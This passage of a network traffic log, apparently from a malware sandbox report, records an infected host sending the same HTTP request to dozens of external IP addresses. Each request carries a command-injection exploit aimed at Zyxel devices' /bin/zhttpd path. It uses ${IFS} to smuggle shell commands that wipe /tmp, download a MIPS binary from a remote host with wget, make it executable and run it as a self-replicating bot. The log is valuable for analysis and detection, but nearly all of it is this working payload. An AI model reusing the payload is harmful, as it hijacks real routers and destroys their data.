                        2275192.168.2.14470341.80.14.49443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.152307034 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2276192.168.2.1454558168.18.129.235443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.152337074 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2277192.168.2.144528038.234.49.165443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.152359009 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2278192.168.2.145165299.189.127.43443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.152396917 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2279192.168.2.145773849.247.70.102443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.152434111 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2280192.168.2.144993451.75.208.208443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.152468920 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2281192.168.2.1443992181.93.101.8443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.152529001 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2282192.168.2.1436152102.50.62.63443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.152633905 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2283192.168.2.1433494112.141.69.196443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.152637005 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2284192.168.2.1448192191.148.26.48443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.152677059 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2285192.168.2.1433416199.1.178.208443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.152714014 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2286192.168.2.1453642144.224.91.78443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.152761936 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2287192.168.2.145199490.1.219.29443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.152812004 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2288192.168.2.1440164126.91.154.157443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.152872086 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2289192.168.2.1457056142.25.109.163443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.152905941 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2290192.168.2.144342612.192.194.248443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.152965069 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2291192.168.2.1432828181.237.229.34443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.152996063 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2292192.168.2.1457168110.86.110.84443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.153019905 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2293192.168.2.145289271.120.25.98443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.153053999 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2294192.168.2.1433110198.87.240.146443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.153095961 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2295192.168.2.144430269.3.127.233443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.153172016 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2296192.168.2.14417045.14.216.255443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.153214931 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2297192.168.2.1443602193.191.100.11443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.153289080 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2298192.168.2.145613264.197.138.253443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.153300047 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2299192.168.2.145677093.157.148.219443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.153322935 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2300192.168.2.144979296.227.192.101443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.153342962 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2301192.168.2.144294088.100.175.237443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.153409958 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2302192.168.2.1452268218.88.143.92443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.153467894 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2303192.168.2.1441918197.163.175.209443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.153486967 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2304192.168.2.1433452164.188.253.184443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.153528929 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2305192.168.2.1449722210.198.223.204443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.153582096 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2306192.168.2.145681253.239.231.139443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.153595924 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2307192.168.2.1437932103.196.150.76443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.153686047 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2308192.168.2.1455828125.145.143.188443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.153701067 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2309192.168.2.1448860139.139.114.15443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.153738022 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2310192.168.2.145569267.177.216.113443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.153775930 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2311192.168.2.1458390178.175.149.10443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.153804064 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2312192.168.2.1454040138.117.12.80443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.153865099 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2313192.168.2.1456060164.50.224.2443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.153918028 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2314192.168.2.143644840.58.247.53443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.153937101 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2315192.168.2.144784845.149.154.228443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.154007912 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2316192.168.2.145605658.237.74.14443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.154037952 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2317192.168.2.143285497.138.197.112443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.154068947 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2318192.168.2.143310075.98.183.246443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.154118061 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2319192.168.2.1433384189.178.30.95443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.154161930 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2320192.168.2.1460386109.249.161.59443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.154205084 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2321192.168.2.1455454121.79.171.189443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.154251099 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2322192.168.2.1437668139.111.7.90443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.154280901 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2323192.168.2.143760449.211.193.2443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.154329062 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2324192.168.2.143673896.1.181.131443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.154361010 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2325192.168.2.1447540160.182.215.181443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.154419899 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2326192.168.2.1444736217.244.90.72443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.154469013 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2327192.168.2.143447866.66.214.90443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.154505968 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2328192.168.2.1440616181.252.208.199443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.154541969 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2329192.168.2.1460270202.233.169.251443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.154578924 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2330192.168.2.143459071.106.171.211443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.154647112 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2331192.168.2.1444922175.14.29.50443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.154700041 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2332192.168.2.145854423.65.71.131443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.154772043 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2333192.168.2.1439266183.133.216.94443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.154784918 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2334192.168.2.1447774154.10.228.40443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.154798031 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2335192.168.2.1434992138.224.229.101443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.154859066 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2336192.168.2.145474474.208.235.251443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.154903889 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2337192.168.2.145785867.207.92.131443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.154946089 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2338192.168.2.1445356164.166.11.179443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.154999018 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2339192.168.2.143843689.142.179.88443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.155057907 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2340192.168.2.144370247.245.182.121443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.155111074 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2341192.168.2.1439826198.229.132.206443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.155155897 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2342192.168.2.1442742104.168.81.14443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.155184031 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2343192.168.2.1441722138.248.64.51443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.155210018 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2344192.168.2.1438300101.197.165.189443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:36.155250072 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


